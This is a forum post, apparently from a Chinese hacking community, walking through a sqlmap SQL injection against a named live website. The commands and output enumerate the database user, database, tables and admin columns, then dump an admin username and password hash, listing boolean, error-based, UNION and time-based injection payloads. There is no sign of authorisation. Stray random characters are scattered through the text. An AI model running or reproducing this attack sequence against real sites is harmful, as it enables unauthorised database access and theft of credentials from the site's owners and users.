找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2426|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
, B$ @3 J8 N3 Ums "Mysql" --current-user       /*  注解:获取当前用户名称
3 I, K7 i7 S% \7 Y4 I9 a* f) T    sqlmap/0.9 - automatic SQL injection and database takeover tool' f) Q1 z, j/ `0 [
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    " Q& c4 d' e; j' q) U7 W0 O2 A/ h[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as8 V9 b4 K! m- u0 c) g+ m
    session file
    ) \2 ~  x4 d: I3 _: m1 A[16:53:54] [INFO] resuming injection data from session file4 x* H! P2 U/ W
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file5 N& g% V; H  B7 y- j# |
    [16:53:54] [INFO] testing connection to the target url8 V6 M9 u7 V) B4 |1 m8 l$ K
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque, }0 F5 T9 R. ]/ w8 H2 f9 m* Z
    sts:
    ' S, t+ D7 v5 _1 t, H( o+ q---
    7 ~4 m$ H7 ^6 T) {$ w1 KPlace: GET
    * {9 k' j7 V2 s1 e6 F6 h- aParameter: id
    * B  @+ ~' z9 A1 y0 ?    Type: boolean-based blind
    " S6 u2 }" W' k( q    Title: AND boolean-based blind - WHERE or HAVING clause
    & a5 p* \1 d) A    Payload: id=276 AND 799=799
    & _. }8 g, M% b3 b: k+ t    Type: error-based" U/ @2 ^- |% K! x$ p5 u
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 G  S, X: c' N6 p
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; B; @' m$ l/ x5 S2 @4 u  `" N
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    5 c$ m  p" ?/ b- Z),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    7 A2 v9 d' z2 A1 [    Type: UNION query- N- B8 c8 z5 t  A
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    1 J) [: G8 J& k7 N% b( R    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    & _. n, m: {0 ]0 D( z(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    + T9 W; U" A8 |2 @! }CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    8 B; E& r& O  b( q6 p    Type: AND/OR time-based blind
    3 n9 n7 r, ?4 E: J( m: C' j    Title: MySQL > 5.0.11 AND time-based blind4 W# w! z" I( h
        Payload: id=276 AND SLEEP(5)# ?* {- D: L/ T) q0 \. |1 d' N- e
    ---
    / I, y5 K% ~: p) L2 Y5 z$ R; }[16:53:55] [INFO] the back-end DBMS is MySQL
    8 K, \4 r, Y- |8 ?: x/ K6 v# ^web server operating system: Windows2 F# k$ [- G- H, G9 b+ S
    web application technology: Apache 2.2.11, PHP 5.3.0
    ! Q- G  U. U! ^0 }0 ?back-end DBMS: MySQL 5.0
    / E/ {9 j# h; ]' J[16:53:55] [INFO] fetching current user& l" Z* g& T. Y/ j2 n; b) Z. t
    current user:    'root@localhost'   
    ( q. ~; l+ X# Z( O7 c[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    & L' g+ r. U" l; l7 B- ^tput\www.wepost.com.hk'
  • shutting down at: 16:53:58
      B4 _& G5 q7 L6 D$ J. ?$ V0 e' r9 k5 z: o
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db4 g! _( J+ l9 ~5 K2 ]9 z
    ms "Mysql" --current-db                  /*当前数据库: W9 X" [# i6 p
        sqlmap/0.9 - automatic SQL injection and database takeover tool. `5 H  u% |. ~- d3 L) e7 c
        http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    & Q; S/ y2 d* Q2 f9 I& ^2 I/ p9 P5 g[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as: J( P& y" d) K3 q6 e  `  T
    session file
    2 k( A' l5 _6 c0 V[16:54:16] [INFO] resuming injection data from session file8 D- e2 [' K' z
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    ) @8 u! S- J7 G/ j[16:54:16] [INFO] testing connection to the target url
    * S5 |# [1 F# p. F( ~sqlmap identified the following injection points with a total of 0 HTTP(s) reque0 b. b3 n1 ]& Z7 V. q$ F9 e7 C
    sts:9 M  S" k. S! v  C  R4 M  r- H
    ---4 S" Z" a5 j. ?8 u8 U
    Place: GET
    ; j! }% \6 o- i6 V4 K: d. }Parameter: id
    * z  D+ b# S; _3 D    Type: boolean-based blind
    ! F, I1 I' y' P; z" y    Title: AND boolean-based blind - WHERE or HAVING clause
    3 ^1 _! o9 ~! Z* M    Payload: id=276 AND 799=799
    : b( H9 b' ?5 Z* u4 H    Type: error-based
    : c1 r  N) ~& s/ z    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    * r# W* f5 E) b. a# B    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    9 }$ q& p3 v. D3 Y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    6 y% E1 u+ F0 u( \  Q( d  w5 S0 K9 c),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    3 V1 C, |  y/ [9 F) c    Type: UNION query$ }  D. U# Z6 B5 O* T
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    , |* n! e* t) m. h( m- F    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    - u, A! J' @! u% }* e7 T0 E! x(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    4 P! H. J! X& a' t# p; lCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    ; I! ?) Y- x; C7 e+ g: p# p    Type: AND/OR time-based blind5 E1 j3 q, P7 |5 p5 D8 i2 }: @
        Title: MySQL > 5.0.11 AND time-based blind5 F* I* J6 g& N
        Payload: id=276 AND SLEEP(5)
    ! T9 x1 G& \% Z  j---
    4 `# C- C* x, ^[16:54:17] [INFO] the back-end DBMS is MySQL
    % C0 L, ^( M- Gweb server operating system: Windows1 p% w; {% c( \# H9 w& @! k. M; K
    web application technology: Apache 2.2.11, PHP 5.3.04 w  C; F: d+ R
    back-end DBMS: MySQL 5.0
    1 `1 `% A; o. g[16:54:17] [INFO] fetching current database
    - _# M* C1 ]" n0 b/ R. ~+ Pcurrent database:    'wepost'
      i" W- e( {" o[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou4 p+ d! u# y+ ~" ~; H( l! I% m: H
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:183 G. R" K7 E' v- U( \6 v2 M
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    $ n! |) s+ A- h" ^, N( {9 Nms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名+ [( l; i9 }( B/ R& J  Z4 X, _
        sqlmap/0.9 - automatic SQL injection and database takeover tool+ B4 W! S9 Q: L& ^8 }" D- `
        http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    6 \- _. o( ~  y: w- B' H; F7 }, @[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    : J0 O% }, N9 o' V2 _6 Q session file' I! {2 _4 ?, Y! W: u
    [16:55:25] [INFO] resuming injection data from session file
    1 a: c4 X- r' e9 Q[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file- z& f' g; |8 l0 S* ?
    [16:55:25] [INFO] testing connection to the target url5 K6 [" K+ H5 V0 Q
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque( }- z: x9 ~7 w/ I6 h+ ^
    sts:& z8 P, o/ e+ o) W  s! C
    ---4 c8 Y6 R* n+ [! s  a8 s
    Place: GET
    - r! F$ T, ^& u) v6 DParameter: id& v! p1 `$ T$ B
        Type: boolean-based blind1 K" s! d2 I1 J! S- f6 i
        Title: AND boolean-based blind - WHERE or HAVING clause
    ; Y& ~: O) L" V# o, x    Payload: id=276 AND 799=799
    - h8 e+ q; u% {, g  C4 w5 r5 }    Type: error-based. c+ V0 K2 H9 q4 x
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    - b' X. ^, C! f+ N; P/ G    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    7 l& G/ o2 _; f6 v+ t120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    7 S+ x, O+ A* K: }5 u),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    7 v1 [! z2 t: q3 l( v5 L$ s    Type: UNION query$ y' Q- W# b% m" T1 A* K
        Title: MySQL UNION query (NULL) - 1 to 10 columns
      `) ]1 D% i( R( Y7 k    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    0 u/ B& v8 `- u(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    2 G# C4 U. H& r2 W% q2 {& y% Q6 C; QCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#; L- q0 z4 U" A! i
        Type: AND/OR time-based blind1 U: ?8 i; ^; _- A) Z, J5 _
        Title: MySQL > 5.0.11 AND time-based blind
    * q' c! C! }  P0 [6 G* e4 \    Payload: id=276 AND SLEEP(5)
    0 m5 E, y8 r. p! T3 Z---0 D2 C$ V$ m1 T5 p3 J8 e9 q  @
    [16:55:26] [INFO] the back-end DBMS is MySQL
    * q$ {( \; b; L2 e- @web server operating system: Windows% Y, L  S! c* ?7 F7 B3 ?) ~; d
    web application technology: Apache 2.2.11, PHP 5.3.0
    + U. {  [9 f7 [  @6 x' ~$ G* [back-end DBMS: MySQL 5.0
    ( u# u5 o" E0 E" d[16:55:26] [INFO] fetching tables for database 'wepost'
    ' t* L' {9 r- G6 h4 I4 H0 v+ T2 T[16:55:27] [INFO] the SQL query used returns 6 entries' v3 J5 u2 M8 n" T) T
    Database: wepost7 f& O0 i0 X- J( T4 O
    [6 tables]
    1 O2 p. o$ A" A# w+-------------+
    " ^5 l9 J* h! t6 P| admin       |7 E* }6 W0 j) C- W# ]) i% I
    | article     |: G2 {- r& v' s8 j; e
    | contributor |
    7 {- `3 ]6 x- Y| idea        |  @( _, R2 W% S$ l# A% L
    | image       |" o1 g3 @4 N0 S  A/ k! C
    | issue       |/ `3 {9 t0 T0 c$ N
    +-------------+7 u3 C& c# D7 v
    [16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou9 L5 p: l1 i/ ~3 y
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:33. J% d/ b6 x4 j) C# @  |

    & G9 w* x8 H7 B1 B" s% I6 p9 x9 N" YD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    & h; z; N" E% k8 ^# l" Ims "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名: m7 c7 W. b% U" A" }( l- i* b0 c
        sqlmap/0.9 - automatic SQL injection and database takeover tool9 R; ?( b% M  M$ q) A$ l6 w
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    . n2 `0 A) g. P) M. jsqlmap identified the following injection points with a total of 0 HTTP(s) reque0 d/ ?+ ]7 K& j9 O( t
    sts:
      b" X; D& ~6 i9 a2 Y& P1 N9 n# N---- d  B8 T' J/ Y" k. L  v& H4 o
    Place: GET
    $ n: Y$ B( S4 G$ fParameter: id, q' Q5 ^( [. u8 H4 q. G
        Type: boolean-based blind
    . _; I9 N8 n5 e, P3 c6 _, W) J, k    Title: AND boolean-based blind - WHERE or HAVING clause' b2 b% d  _+ M, u; {% n+ O" A
        Payload: id=276 AND 799=799
    & i2 W' Y( c+ B  d" o1 N    Type: error-based
    7 j' u2 X% w4 c) f- ?    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause, [3 {+ p0 ?6 o# k* R: `
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,2 W( _6 t7 _! ~3 B  d: {- b8 q
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,583 }" E' n$ n" Y+ C8 _: ~! w6 |
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    2 S. V0 `! F% D5 A4 G/ ^1 l% \    Type: UNION query* u5 n7 c$ r! T  S5 }
        Title: MySQL UNION query (NULL) - 1 to 10 columns# W* P3 D0 r3 B# c
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    : L2 A& }3 k7 G, r" h6 G5 a/ m7 x(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),% _" K" n: D  o/ `$ i8 ~
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL## Q, E; n8 |4 |; `
        Type: AND/OR time-based blind  X  R% o5 i, X) B6 b& N* B
        Title: MySQL > 5.0.11 AND time-based blind( U  M% x4 a# U  c: R2 ~
        Payload: id=276 AND SLEEP(5)4 i4 S* h' U6 @5 H) A6 H/ }% o. W
    ---: N" r% ~1 x" r% ?
    web server operating system: Windows/ ?5 T* D1 @  B* O) g8 M
    web application technology: Apache 2.2.11, PHP 5.3.0
    ( _: y5 e! S. |& w% tback-end DBMS: MySQL 5.0
    ; e- K# r. o2 K( q6 E; q  K[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se/ Y% F4 G6 _+ a! @% x$ d" Q1 o
    ssion': wepost, wepost
    ( r  U4 W6 E# FDatabase: wepost# ]5 r) H+ E- z) m' ]: u
    Table: admin4 N% i" E4 k; B5 ~8 e; ^5 e3 [
    [4 columns]& P( h& m' @( d  |% H! E+ J4 s
    +----------+-------------+
    . f9 i% _8 Z, {5 c" i7 B+ _| Column   | Type        |2 e1 L) y' L' m) O" t- @
    +----------+-------------+. T! r% w& |) T  r8 ~, Y: c2 J
    | id       | int(11)     |
    8 |1 q1 S- \2 f: H# ~+ ^| password | varchar(32) |
    + F( [0 D+ [( b4 V+ S| type     | varchar(10) |& v) b# `& e( B& ^" `' O! X7 _
    | userid   | varchar(20) |5 a, D3 W# l) B8 }1 E; a( o  G
    +----------+-------------+# ?: P* o& q" e/ t8 z1 P0 i
  • shutting down at: 16:56:196 ?6 R: ?$ B3 X' v

      k% n2 ?, t4 p" b& M; ^) nD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db5 t+ j; H8 v, a1 W) j
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容' ]) w8 l4 }  a
        sqlmap/0.9 - automatic SQL injection and database takeover tool/ D& b: a+ v1 o+ ~$ k/ ~# E# G" |
        http://sqlmap.sourceforge.net
  • starting at: 16:57:14
    : s3 S: G, D( msqlmap identified the following injection points with a total of 0 HTTP(s) reque
    / y) n, c) D9 q% Z4 |. @0 t" }; qsts:2 Z- W# h% _8 _0 h9 s. b
    ---
    3 Y( _  Z% b/ `6 d% xPlace: GET
    % `$ O6 C# j/ [9 ~& K) OParameter: id' \4 {; E6 F3 x, G8 ^5 H" l. y& Q
        Type: boolean-based blind
    & [% ]  G5 [! t& R  n& Z+ z    Title: AND boolean-based blind - WHERE or HAVING clause
    + o8 l/ |- U$ D& A4 G    Payload: id=276 AND 799=799
    0 z5 G  ^4 D3 |+ T' L' i    Type: error-based+ Q6 Z' T  b% ~$ R
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ; W; L, {* Q* E6 ~$ t6 [  i    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,  r( a& Y( p# v  x* _* i
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    " J4 T& q( g' `7 R3 I. M6 n),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)) c  m' N4 ]$ n  ]8 x2 }
        Type: UNION query: H! a# ?2 S4 k2 K. l5 H
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    + y$ T4 H7 U+ O' F% u2 `, s' Z    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR" Q. {) R2 c) b6 \7 A; a$ Y2 x1 h( C
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    , A8 L) p$ J) ~1 h9 hCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#4 F6 _* X9 A9 z' c
        Type: AND/OR time-based blind
    ) R% ^+ H+ }" [) r3 K1 V* J, r    Title: MySQL > 5.0.11 AND time-based blind2 L/ R1 Y  U# ?
        Payload: id=276 AND SLEEP(5)
    ' q9 v! \% x  D---  o' d) G  o" k
    web server operating system: Windows1 s+ B' C2 E) m% w
    web application technology: Apache 2.2.11, PHP 5.3.0
    4 L% f; q+ B1 _: g2 C* _5 s, Oback-end DBMS: MySQL 5.0
    % P4 m  \9 r' r5 b$ Irecognized possible password hash values. do you want to use dictionary attack o$ O6 \& r* L) T( l( T
    n retrieved table items? [Y/n/q] y
    5 E1 c% N+ H* qwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
    , ^3 a) n2 p* Y* Y* ?do you want to use common password suffixes? (slow!) [y/N] y6 b- z+ j, X1 k  U6 J& ~/ j
    Database: wepost, z& e& c. l' D1 q
    Table: admin% Q. S3 L2 S: `2 _. E
    [1 entry], s3 _# N( e9 L
    +----------------------------------+------------+
    ! g; `+ |# @  X8 I: p| password                         | userid     |7 w$ H* J8 w0 c6 P
    +----------------------------------+------------+6 ?4 v; `, T! Q7 z" E1 W
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    / Z  ~7 k: ^/ _4 M+----------------------------------+------------+! O. @# v6 ?0 @* |  _+ b. _
  • shutting down at: 16:58:14+ o7 P) \9 f. q) v
    . R! a: d0 V/ Y" }  [
    D:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表